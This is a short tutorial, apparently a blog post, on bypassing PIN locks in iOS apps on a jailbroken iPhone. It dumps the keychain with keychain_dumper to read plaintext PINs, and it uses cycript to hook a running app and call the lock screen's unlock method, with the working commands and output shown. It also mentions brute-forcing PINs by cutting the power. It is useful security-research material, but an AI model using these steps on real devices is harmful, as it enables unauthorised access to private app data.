For these hacks the iPhone must be jailbroken. But there currently is a jailbreak available for iOS 8.4 and some below. 4 digit pins can be bruteforced unless there is a attempt limit. Even with the limit it can still be hacked but you would need to break the phone open to rig the power to cut before the attempt is registered. Example here.
For all of these you need:
- Phone to be jailbroken
- OpenSSH installed on the phone
###1) Dump the iOS Keychain
This is stupid easy. And it's terrifying how many apps store their pins & passwords in plaintext.
Using KeyChain-Dumper. Installed by cloning and using scp
to place in the phones root dir.
Then just run it: $ ./keychain_dumper
You can see the pin highlighted in plaintext.
Generic Password
----------------
Service: AppName
Account: secret
Entitlement Group: X9V42BVZ5X
Label: (null)
Generic Field: (null)
Keychain Data: 1234
###2) Method Swizzling
This is also pretty easy. In many apps the only thing keeping you from the app's data is a view. For this one I enabled touch ID even though it doesn't really matter because you can still login with the pin. This requires cycript which can be installed on Cydia straight to the iPhone.
Once we ssh
in we must find the process for the app.
$ ps aux | grep "appName"
You'll get something like this. The 2nd number, in this case 4293
is the process number.
mobile 4293 0.0 2.8 623812 28572 ?? Ss 6:17PM 0:00.81 /var/mobile/Containers/Bundle/Application/59575112-731A-4A93-B0D3-431599D30C8A/AppName.app/AppName
Now you want to use cycript to jack into that process
$ cycript -p 4293
cy#
Now you need to find the current visible view controller with cycript
cy# UIApp.keyWindow.rootViewController.visibleViewController
#"<LockViewController: 0x145534940>"
Now we found that LockViewController
is what we're currently seeing, we can take a look at its methods to see if anything looks interesting. Cycript does js so we can write a function into the cycript interpreter to see the methods.
function printMethods(className) {
var count = new new Type("I");
var methods = class_copyMethodList(objc_getClass(className), count);
var methodsArray = [];
for(var i = 0; i < *count; i++) {
var method = methods[i];
methodsArray.push({selector:method_getName(method), implementation:method_getImplementation(method)});
}
free(methods);
free(count);
return methodsArray;
}
cy# printMethods(LockViewController) // this prints a ton of methods
[{selector:@selector(unlock),implementation:0x1000fa774}, ,{selector:@selector(disableTouchID),implementation:0x1000fc3fc},
{selector:@selector(hasRemainingPasswordAttempts),implementation:0x1000fb0b4},...]
There usually is quite a few methods that print out but I showed some interesting ones. Especially unlock
.
To call that method we simply use this command.
cy# [UIApp.keyWindow.rootViewController.visibleViewController unlock]
Then poof the lock is gone and you're in the app with all of it's "secure" data.